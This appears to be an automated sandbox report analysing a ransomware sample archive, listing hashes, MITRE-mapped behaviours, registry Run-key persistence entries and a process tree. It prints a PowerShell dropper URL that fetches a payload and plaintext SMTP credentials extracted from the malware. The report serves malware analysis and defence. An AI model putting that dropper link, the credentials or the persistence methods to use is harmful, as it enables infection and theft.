4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23

Resubmissions

10-09-2024 18:03

240910-wnbk6axblq 10

10-09-2024 17:52

240910-wf31faxgqb 10

Analysis

max time kernel
191s
max time network
189s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
10-09-2024 17:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00486.7z
Size

117.8MB
MD5

9cad20cac5e7a2828d978175bb888a8d
SHA1

d7253644d5b0c999adef488892b0b34115576d53
SHA256

4b4567580aa77913f8b2845b322a1fa43010c5210f791fbbe780ec75934a4f23
SHA512

271023ad2f017c2a89e81ebe67725ad3ef5e4114bd0249505fa1fff6ca102a314b93ef3ac7463f816b187b1cc11f521465138dbfcff8a08d32e1ce3ac0855b87
SSDEEP

3145728:4AORmmLuCgOX0cXsvmpqt8t2ed+Uv81oz+tHTQY:lmym0HvmZdZZszQY

Score

10^/10

discovery persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://cdn.discordapp.com/attachments/880265796767608892/881902176195186728/New_Text_Document.txt

Extracted

Credentials

Protocol: smtp
Host:
smtp.yandex.com.tr
Port:
587
Username:
[email protected]
Password:
010203040506

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
66	3092	powershell.exe

Checks computer location settings 2 TTPs 9 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	smss.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe

Executes dropped EXE 18 IoCs

pid	Process
1996	HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
1844	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
4384	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
1896	HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
4812	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
1740	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
2464	zbhnd.exe
768	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
1192	Setup.exe
2480	Google123.exe
3540	smss.exe
4776	HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
4832	Setup.tmp
5056	7D57AD13E21.exe
4480	BD366504095.exe
5092	Scegli_nome_allegato.exe
4828	7D57AD13E21.exe
2492	BD366504095.exe

Loads dropped DLL 5 IoCs

pid	Process
4832	Setup.tmp
4832	Setup.tmp
4832	Setup.tmp
4832	Setup.tmp
4832	Setup.tmp

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00080000000234b8-22.dat	upx
behavioral1/files/0x0007000000023592-458.dat	upx

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RNSM00486\\00486\\HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe\""	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Hacker Man = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\svchost.exe"	HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google123 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Google123.exe\""	Google123.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\7D57AD13E21.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\BD366504095.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\Users\\Admin\\AppData\\Roaming\\smss.exe\""	smss.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
59	checkip.dyndns.org

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 5056 set thread context of 4828	5056	7D57AD13E21.exe	152
PID 4480 set thread context of 2492	4480	BD366504095.exe	153

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4440	1996	WerFault.exe	105
556	1996	WerFault.exe	105

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Scegli_nome_allegato.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7D57AD13E21.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zbhnd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Setup.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BD366504095.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BD366504095.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.MSIL.Foreign.gen-c2233ca7136cc0b6ed13e5d7f6aa05ea766bcbb60914d99ca51b333e44ab8b1d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Blocker.vho-d0dc33d6db9913efe1f1dd451f467fc7d1091ee26ca49a8896acfa6cc04d742b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7D57AD13E21.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	Scegli_nome_allegato.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	Scegli_nome_allegato.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\Software\Microsoft\Internet Explorer\IESettingSync	Scegli_nome_allegato.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	Scegli_nome_allegato.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
1540	reg.exe
844	reg.exe
3700	reg.exe

Suspicious behavior: EnumeratesProcesses 42 IoCs

pid	Process
4372	powershell.exe
4372	powershell.exe
728	powershell.exe
728	powershell.exe
1792	powershell.exe
1792	powershell.exe
4560	powershell.exe
4560	powershell.exe
4312	powershell.exe
4312	powershell.exe
4804	powershell.exe
4804	powershell.exe
2112	powershell.exe
2112	powershell.exe
3812	powershell.exe
3812	powershell.exe
2212	powershell.exe
2212	powershell.exe
4804	powershell.exe
2212	powershell.exe
2112	powershell.exe
1792	powershell.exe
728	powershell.exe
4560	powershell.exe
4312	powershell.exe
3812	powershell.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
3092	powershell.exe
3092	powershell.exe
3092	powershell.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe
2480	Google123.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	3984	7zG.exe
Token: 35	3984	7zG.exe
Token: SeSecurityPrivilege	3984	7zG.exe
Token: SeSecurityPrivilege	3984	7zG.exe
Token: SeDebugPrivilege	4372	powershell.exe
Token: SeDebugPrivilege	4384	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe
Token: SeDebugPrivilege	2480	Google123.exe
Token: SeDebugPrivilege	728	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	3812	powershell.exe
Token: SeIncreaseQuotaPrivilege	2212	powershell.exe
Token: SeSecurityPrivilege	2212	powershell.exe
Token: SeTakeOwnershipPrivilege	2212	powershell.exe
Token: SeLoadDriverPrivilege	2212	powershell.exe
Token: SeSystemProfilePrivilege	2212	powershell.exe
Token: SeSystemtimePrivilege	2212	powershell.exe
Token: SeProfSingleProcessPrivilege	2212	powershell.exe
Token: SeIncBasePriorityPrivilege	2212	powershell.exe
Token: SeCreatePagefilePrivilege	2212	powershell.exe
Token: SeBackupPrivilege	2212	powershell.exe
Token: SeRestorePrivilege	2212	powershell.exe
Token: SeShutdownPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeSystemEnvironmentPrivilege	2212	powershell.exe
Token: SeRemoteShutdownPrivilege	2212	powershell.exe
Token: SeUndockPrivilege	2212	powershell.exe
Token: SeManageVolumePrivilege	2212	powershell.exe
Token: 33	2212	powershell.exe
Token: 34	2212	powershell.exe
Token: 35	2212	powershell.exe
Token: 36	2212	powershell.exe
Token: SeIncreaseQuotaPrivilege	4804	powershell.exe
Token: SeSecurityPrivilege	4804	powershell.exe
Token: SeTakeOwnershipPrivilege	4804	powershell.exe
Token: SeLoadDriverPrivilege	4804	powershell.exe
Token: SeSystemProfilePrivilege	4804	powershell.exe
Token: SeSystemtimePrivilege	4804	powershell.exe
Token: SeProfSingleProcessPrivilege	4804	powershell.exe
Token: SeIncBasePriorityPrivilege	4804	powershell.exe
Token: SeCreatePagefilePrivilege	4804	powershell.exe
Token: SeBackupPrivilege	4804	powershell.exe
Token: SeRestorePrivilege	4804	powershell.exe
Token: SeShutdownPrivilege	4804	powershell.exe
Token: SeDebugPrivilege	4804	powershell.exe
Token: SeSystemEnvironmentPrivilege	4804	powershell.exe
Token: SeRemoteShutdownPrivilege	4804	powershell.exe
Token: SeUndockPrivilege	4804	powershell.exe
Token: SeManageVolumePrivilege	4804	powershell.exe
Token: 33	4804	powershell.exe
Token: 34	4804	powershell.exe
Token: 35	4804	powershell.exe
Token: 36	4804	powershell.exe
Token: SeIncreaseQuotaPrivilege	2112	powershell.exe
Token: SeSecurityPrivilege	2112	powershell.exe
Token: SeTakeOwnershipPrivilege	2112	powershell.exe
Token: SeLoadDriverPrivilege	2112	powershell.exe
Token: SeSystemProfilePrivilege	2112	powershell.exe
Token: SeSystemtimePrivilege	2112	powershell.exe
Token: SeProfSingleProcessPrivilege	2112	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3984	7zG.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3672	OpenWith.exe
3020	cmd.exe
2480	Google123.exe
5092	Scegli_nome_allegato.exe
5092	Scegli_nome_allegato.exe
5092	Scegli_nome_allegato.exe
4828	7D57AD13E21.exe
2492	BD366504095.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4372 wrote to memory of 3020	4372	powershell.exe	97
PID 4372 wrote to memory of 3020	4372	powershell.exe	97
PID 3020 wrote to memory of 1996	3020	cmd.exe	105
PID 3020 wrote to memory of 1996	3020	cmd.exe	105
PID 3020 wrote to memory of 1996	3020	cmd.exe	105
PID 3020 wrote to memory of 1844	3020	cmd.exe	106
PID 3020 wrote to memory of 1844	3020	cmd.exe	106
PID 3020 wrote to memory of 1844	3020	cmd.exe	106
PID 3020 wrote to memory of 4384	3020	cmd.exe	107
PID 3020 wrote to memory of 4384	3020	cmd.exe	107
PID 3020 wrote to memory of 1896	3020	cmd.exe	109
PID 3020 wrote to memory of 1896	3020	cmd.exe	109
PID 3020 wrote to memory of 1896	3020	cmd.exe	109
PID 3020 wrote to memory of 4812	3020	cmd.exe	110
PID 3020 wrote to memory of 4812	3020	cmd.exe	110
PID 3020 wrote to memory of 4812	3020	cmd.exe	110
PID 3020 wrote to memory of 1740	3020	cmd.exe	112
PID 3020 wrote to memory of 1740	3020	cmd.exe	112
PID 3020 wrote to memory of 1740	3020	cmd.exe	112
PID 1844 wrote to memory of 5092	1844	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe	114
PID 1844 wrote to memory of 5092	1844	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe	114
PID 1844 wrote to memory of 5092	1844	HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe	114
PID 4812 wrote to memory of 2464	4812	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe	115
PID 4812 wrote to memory of 2464	4812	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe	115
PID 4812 wrote to memory of 2464	4812	HEUR-Trojan-Ransom.Win32.Blocker.pef-183fe60685793684667d24b70fc07dd85dbc44551cc61c7186b191ead7da0c20.exe	115
PID 3020 wrote to memory of 768	3020	cmd.exe	116
PID 3020 wrote to memory of 768	3020	cmd.exe	116
PID 3020 wrote to memory of 768	3020	cmd.exe	116
PID 5092 wrote to memory of 1192	5092	WScript.exe	118
PID 5092 wrote to memory of 1192	5092	WScript.exe	118
PID 5092 wrote to memory of 1192	5092	WScript.exe	118
PID 3020 wrote to memory of 4776	3020	cmd.exe	119
PID 3020 wrote to memory of 4776	3020	cmd.exe	119
PID 3020 wrote to memory of 4776	3020	cmd.exe	119
PID 4384 wrote to memory of 2480	4384	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe	120
PID 4384 wrote to memory of 2480	4384	HEUR-Trojan-Ransom.MSIL.Blocker.gen-806e906c526335d1f08124ba1fc5556f3b1a7992bfde128c2f8245a69570ef6e.exe	120
PID 5092 wrote to memory of 3540	5092	WScript.exe	121
PID 5092 wrote to memory of 3540	5092	WScript.exe	121
PID 1192 wrote to memory of 4832	1192	Setup.exe	123
PID 1192 wrote to memory of 4832	1192	Setup.exe	123
PID 1192 wrote to memory of 4832	1192	Setup.exe	123
PID 3540 wrote to memory of 2212	3540	smss.exe	124
PID 3540 wrote to memory of 2212	3540	smss.exe	124
PID 3540 wrote to memory of 1792	3540	smss.exe	126
PID 3540 wrote to memory of 1792	3540	smss.exe	126
PID 3540 wrote to memory of 728	3540	smss.exe	127
PID 3540 wrote to memory of 728	3540	smss.exe	127
PID 3540 wrote to memory of 4804	3540	smss.exe	128
PID 3540 wrote to memory of 4804	3540	smss.exe	128
PID 3540 wrote to memory of 3812	3540	smss.exe	132
PID 3540 wrote to memory of 3812	3540	smss.exe	132
PID 3540 wrote to memory of 4560	3540	smss.exe	134
PID 3540 wrote to memory of 4560	3540	smss.exe	134
PID 3540 wrote to memory of 4312	3540	smss.exe	136
PID 3540 wrote to memory of 4312	3540	smss.exe	136
PID 3540 wrote to memory of 2112	3540	smss.exe	138
PID 3540 wrote to memory of 2112	3540	smss.exe	138
PID 1740 wrote to memory of 1540	1740	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe	141
PID 1740 wrote to memory of 1540	1740	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe	141
PID 1740 wrote to memory of 1540	1740	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe	141
PID 768 wrote to memory of 844	768	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe	143
PID 768 wrote to memory of 844	768	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe	143
PID 768 wrote to memory of 844	768	HEUR-Trojan-Ransom.Win32.Blocker.vho-86b0012e23bb0e440e554bafcba82c592fd0d799750724e20b276ef3c98a0fbe.exe	143
PID 1740 wrote to memory of 5056	1740	HEUR-Trojan-Ransom.Win32.Blocker.vho-560671f20dbab423c109b63a24c544c3a21d2a4cb8fbfcf6477e50fa78c5739a.exe	145

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00486.7z
1⤵
- Modifies registry class
PID:4724

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3672

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3564

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\RNSM00486\" -spe -an -ai#7zMap5264:96:7zEvent21266
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4372
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
    HEUR-Packed.Win32.BadCrypt.gen-3e85c83f4e2c9c36a3be65b6e7c4b28783966774781dfcdf0bef387b5c15fe8b.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 272
      4⤵
      Program crash
      PID:4440
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 276
      4⤵
      Program crash
      PID:556
- - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-30eed24b9721591b98e9e9d201c806f3d5cbabd201fbaca73b7ab533666fed23.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\djfgkjdnbkjdfhooerkhjfjdlfkgdf.vbs"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5092
    - - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1192
      - C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2L84U.tmp\Setup.tmp" /SL5="$4023A,3291817,140800,C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\Setup.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4832
    - - C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RNSM00486\00486\smss.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:3540
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1792
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:728
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4804
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3812
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4312
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection youtube.com
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2112
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
